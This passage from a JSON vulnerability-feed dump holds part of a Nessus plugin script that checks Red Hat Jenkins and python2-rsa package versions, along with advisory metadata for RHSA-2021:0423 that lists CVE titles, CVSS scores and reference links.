value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11979\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 59, 79, 200, 377, 385, 502, 611, 770, 862, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python2-rsa\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'openshift_3_11_el7': [\n 'rhel-7-server-ose-3.11-debug-rpms',\n 'rhel-7-server-ose-3.11-rpms',\n 'rhel-7-server-ose-3.11-source-rpms'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'jenkins-2-plugins-3.11.1612862361-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_3_11_el7']},\n {'reference':'jenkins-2.263.3.1612433584-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_3_11_el7']},\n {'reference':'python2-rsa-4.5-3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'atomic-openshift-', 'repo_list':['openshift_3_11_el7']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'jenkins / jenkins-2-plugins / python2-rsa');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:jenkins", "p-cpe:/a:redhat:enterprise_linux:jenkins-2-plugins", "p-cpe:/a:redhat:enterprise_linux:python2-rsa"], "solution": "Update the affected jenkins, jenkins-2-plugins and / or python2-rsa packages.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-11979", "vpr": {"risk factor": "Medium", "score": "6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-03T00:00:00", "vulnerabilityPublicationDate": "2020-05-14T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "REDHAT-RHSA-2021-0423.NASL", "hash": "11329db79731482eb7dbb03ad5ab6180", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 8 : OpenShift Container Platform 4.6.17 (RHSA-2021:0423)", "description": "The remote Redhat Enterprise Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2021:0423 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-02-18T00:00:00", "modified": "2021-10-07T00:00:00", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/146566", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.redhat.com/1925143", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://bugzilla.redhat.com/1925140", "https://cwe.mitre.org/data/definitions/22.html", "https://cwe.mitre.org/data/definitions/59.html", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/863.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1945", "https://bugzilla.redhat.com/1925156", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21607", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://bugzilla.redhat.com/1925157", "https://access.redhat.com/errata/RHSA-2021:0423", "https://bugzilla.redhat.com/1925141", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21610", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1837444", "https://bugzilla.redhat.com/1925159", "https://cwe.mitre.org/data/definitions/502.html", "https://cwe.mitre.org/data/definitions/377.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21609", "https://bugzilla.redhat.com/1925160", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21611", "https://bugzilla.redhat.com/1925151", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21606", "https://access.redhat.com/security/cve/CVE-2020-1945", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21605", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21608", "https://bugzilla.redhat.com/1921322", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11979", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21603", "https://access.redhat.com/security/cve/CVE-2021-21605", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21615", "https://bugzilla.redhat.com/1925161", "https://access.redhat.com/security/cve/CVE-2021-21602", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21602", "https://cwe.mitre.org/data/definitions/79.html", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2021-21610", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21604", "https://cwe.mitre.org/data/definitions/20.html"], "cvelist": ["CVE-2020-1945", "CVE-2020-11979", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21615"], "immutableFields": [], "lastseen": "2021-10-07T23:47:14", "history": [{"bulletin": {"id": "REDHAT-RHSA-2021-0423.NASL", "hash": "3fd9e546526d608739718777093b0fb174c83a16b049e6b703c2c4331b243f0e", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.6.17 (RHSA-2021:0423)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0423 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-02-18T00:00:00", "modified": "2021-02-18T00:00:00", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.0, "vector": "AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/146566", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/CVE-2021-21610", "https://cwe.mitre.org/data/definitions/79.html", "https://access.redhat.com/security/cve/CVE-2021-21602", "https://bugzilla.redhat.com/1925143", "https://cwe.mitre.org/data/definitions/863.html", "https://bugzilla.redhat.com/1925156", "https://access.redhat.com/security/cve/CVE-2020-1945", "https://bugzilla.redhat.com/1925145", "https://cwe.mitre.org/data/definitions/770.html", "https://access.redhat.com/security/cve/CVE-2021-21611", "https://cwe.mitre.org/data/definitions/20.html", "https://access.redhat.com/security/cve/CVE-2021-21607", "https://bugzilla.redhat.com/1921322", "https://access.redhat.com/security/cve/CVE-2021-21606", "https://bugzilla.redhat.com/1925159", "https://access.redhat.com/security/cve/CVE-2021-21604", "https://access.redhat.com/security/cve/CVE-2021-21603", "https://bugzilla.redhat.com/1925160", "https://cwe.mitre.org/data/definitions/22.html", "https://access.redhat.com/security/cve/CVE-2020-11979", "https://access.redhat.com/security/cve/CVE-2021-21609", "https://cwe.mitre.org/data/definitions/377.html", "https://bugzilla.redhat.com/1925141", "https://cwe.mitre.org/data/definitions/59.html", "https://access.redhat.com/security/cve/CVE-2021-21615", "https://access.redhat.com/errata/RHSA-2021:0423", "https://cwe.mitre.org/data/definitions/502.html", "https://bugzilla.redhat.com/1837444", "https://access.redhat.com/security/cve/CVE-2021-21608", "https://bugzilla.redhat.com/1925161", "https://bugzilla.redhat.com/1925157", "https://bugzilla.redhat.com/1925140", "https://bugzilla.redhat.com/1925151", "https://bugzilla.redhat.com/1903702", "https://access.redhat.com/security/cve/CVE-2021-21605"], "cvelist": ["CVE-2021-21609", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21606", "CVE-2021-21604", "CVE-2020-11979", "CVE-2020-1945", "CVE-2021-21602", "CVE-2021-21615", "CVE-2021-21603", "CVE-2021-21610", "CVE-2021-21611", "CVE-2021-21605"], "immutableFields": [], "lastseen": "2021-02-19T06:21:13", "history": [], "viewCount": 3, "enchantments": {"d